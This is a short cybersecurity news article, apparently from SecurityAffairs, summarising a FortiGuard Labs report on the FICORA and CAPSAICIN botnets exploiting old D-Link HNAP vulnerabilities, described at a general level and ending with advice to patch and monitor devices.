FortiGuard Labs researchers have recently detected a notable increase in activity involving two botnets known as “FICORA” and “CAPSAICIN.” The Mirai variant “FICORA” and Kaiten variant “CAPSAICIN” have been particularly active, targeting vulnerabilities in D-Link devices through the HNAP interface to enable remote command execution. These botnets have exploited vulnerabilities such as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112 to infiltrate target devices.
According to a report published by Fortinet, the continued propagation of these botnets can be attributed to attackers reusing older attacks. The researchers noted that the “FICORA” campaign, which targeted numerous countries, appeared to be more widespread rather than a result of specific targeted attacks. On the other hand, the “CAPSAICIN” botnet exhibited heightened activity over a two-day period in late October 2024, primarily focusing on East Asian countries.
The operational tactics of the “FICORA” botnet involve the downloading and execution of a shell script named “multi,” which is subsequently deleted. This script employs various methods such as “wget,” “ftpget,” “curl,” and “tftp” to retrieve malware, terminating processes with matching file extensions before downloading and running the malicious code across multiple Linux architectures. The configuration of the malware, including its designated command and control server domain and a distinct string, is encrypted using the ChaCha20 algorithm.
In contrast, the “CAPSAICIN” botnet utilizes a downloader script labeled “bins.sh” to acquire the bot for various Linux architectures from a specific IP address. The malware deployed by this botnet terminates other known bot processes to maintain exclusive control before connecting to its command and control server to relay the victim’s operating system details and a unique identifier.
Despite the fact that the vulnerabilities exploited by these botnets were identified and addressed nearly a decade ago, they have remained active and pervasive globally. FortiGuard Labs emphasized the necessity for enterprises to regularly update their devices’ kernels and implement comprehensive monitoring to mitigate the risk of malware proliferation via these vulnerabilities.
The research underscores the importance of maintaining proactive cybersecurity measures to safeguard against evolving threats posed by persistent botnets like “FICORA” and “CAPSAICIN.” By staying vigilant and implementing recommended security protocols, organizations can fortify their defenses and reduce the likelihood of falling victim to malicious cyber activities facilitated by outdated vulnerabilities.
For the latest updates on cybersecurity trends and threats, follow @securityaffairs on Twitter, Facebook, and Mastodon. Stay informed and stay secure in an ever-evolving digital landscape.
Pierluigi Paganini
SecurityAffairs – hacking, FICORA botnet
Original Post URL: https://securityaffairs.com/172373/uncategorized/surge-ficora-kaiten-botnets.html